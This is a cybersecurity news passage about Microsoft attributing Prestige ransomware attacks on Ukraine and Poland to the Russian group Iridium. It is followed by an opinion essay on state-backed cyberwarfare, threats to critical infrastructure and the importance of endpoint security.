The method of initial compromise still remains unknown, although it's suspected that it involved gaining access to highly privileged credentials necessary to activate the killchain.

"The Prestige campaign may highlight a measured shift in Iridium's destructive attack calculus, signaling increased risk to organizations directly supplying or transporting humanitarian or military assistance to Ukraine," the company said.

The findings come over a month after Recorded Future linked another activity group (UAC-0113) with ties to the Sandworm actor as having singled out Ukrainian users by masquerading as telecom providers in the country to deliver backdoors onto compromised machines.

Microsoft, in its Digital Defense Report published last week, further called out Iridium for its pattern of targeting critical infrastructure and operational technology entities.

"Iridium deployed the Industroyer2 malware in a failed effort to leave millions of people in Ukraine without power," Redmond said, adding the threat actor used "phishing campaigns to gain initial access to desired accounts and networks in organizations within and outside Ukraine."

The development also arrives amid sustained ransomware attacks aimed at industrial organizations worldwide during the third quarter of 2022, with Dragos reporting 128 such incidents during the time period compared to 125 in the previous quarter.

"The LockBit ransomware family account for 33% and 35% respectively of the total ransomware incidents that target industrial organizations and infrastructures in the last two quarters, as the groups added new capabilities in their new LockBit 3.0 strain," the industrial security firm said.

Other prominent strains observed in Q3 2022 include Cl0p, MedusaLocker, Sparta, BianLian, Donuts, Onyx, REvil, and Yanluowang.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Blames Russian Hackers for Prestige Ransomware Attacks on Ukraine and Poland

The line between criminal and political aims has become blurred, but motivations matter less than the effects of a breach.

Cybersecurity professionals have long discussed the notion that future conflicts will no longer be fought just on a physical battlefield, but in the digital space as well. Although recent conflicts show that the physical battlefield isn't going anywhere soon, we are also seeing more state-backed cyberattacks than ever before. It is therefore vital that businesses, individuals, and governments ensure they are prepared for an attack. In the digital battleground it isn't just soldiers being targeted — everyone is in the line of fire.

Broadly speaking, an act of cyberwar is any state-backed malicious online activity that targets foreign networks. However, as with most geopolitical phenomena, real-world examples of cyberwarfare are far more complex. In the murky world of state-backed cybercrime, it isn't always government intelligence agencies directly carrying out attacks. Instead, it's far more common to see attacks from organized cybercriminal organizations that have ties to a nation-state. These organizations are known as advanced persistent threat (APT) groups. The infamous APT-28, also known as Fancy Bear, that hacked the Democratic National Committee in 2016 is a great example of this type of espionage.

The loose ties between APT groups and state intelligence agencies mean the lines between international espionage and more traditional cybercrime are blurred. This makes defining whether a particular attack is an "act of cyberwarfare" difficult. As such, security analysts are often only able to hypothesize whether an attack was state backed by percentages and degrees of certainty. This, in a way, is the perfect cover for malicious state agencies that wish to target and disrupt critical infrastructure while lowering the potential for generating a geopolitical crisis or armed conflict.

**If the Enemy Is in Range, So Are You**

Regardless of whether a cyberattack is directly linked to a foreign state agency, attacks on critical infrastructure can have devastating consequences. Critical infrastructure does not just refer to state-owned and operated infrastructure such as power grids and government organizations; banks, large corporations, and ISPs all fall under the umbrella of critical infrastructure targets.

For example, a targeted "hack, pump, and dump" scheme, where multiple personal online trading portfolios are compromised in order to manipulate share prices, could be undertaken by a state-backed group to damage savings and retirement funds in another nation, with potentially catastrophic consequences for the economy.

As governments and private organizations continue to adopt smart and connected IT networks, the risks and potential consequences will continue to grow. Recent research by the University of Michigan found significant security flaws in local traffic light systems. From a single access point, the research team was able to take control of over 100 traffic signals. Although the flaw in this system has subsequently been patched, this highlights the importance of robust, up-to-date inbuilt security systems to protect infrastructure from cyberattacks.

**Defend Now or Be Conquered Later**

With larger and more complex networks, the chance that vulnerabilities can be exploited increases exponentially. If organizations are to stand any chance against a sophisticated state-backed attack, every single endpoint on the network must be continually monitored and secured.

Some have already learned this lesson the hard way. In 2017, US food giant Mondelez was denied a $100 million insurance pay-out after suffering a Russian ATP cyberattack because the attack was deemed to be "an act of war" and not covered under the firm's cybersecurity insurance policy. (The conglomerate and Zurich Insurance recently settled their dispute on undisclosed terms.)

Endpoint security has never been more critical than today. The use of personal mobile devices as a work tool has become pervasive across almost every single industry. Scarily, this rise in bring-your-own-devices policy has in part been driven by the false assumption that mobile devices are inherently more secure than desktops.

However, several governments and ATP groups with well-established cyber capabilities have adapted to and exploited the mobile threat landscape for over 10 years with dangerously low detection rates. Attacks on government and civilian mobile networks have the potential to take down large portions of a workforce, grinding productivity to a halt and disrupting everything from government decision-making to the economy.

In today's threat landscape, cyberattacks aren't just a potential risk but are to be expected. Thankfully, the solution to minimize the damage is relatively straightforward: Trust no-one and secure everything.

IT and security managers may not be able to prevent a cyberattack or a cyberwar; however, they can defend themselves against the worst outcomes. If a device is connected to the infrastructure, whether physically or virtually, it is a potential back door for threat actors to access data and disrupt operations. So, if organizations want to avoid being caught in the crossfire of cyberwarfare, endpoint security must be the first priority in all operations, from mobile to desktop.

Tag

#intel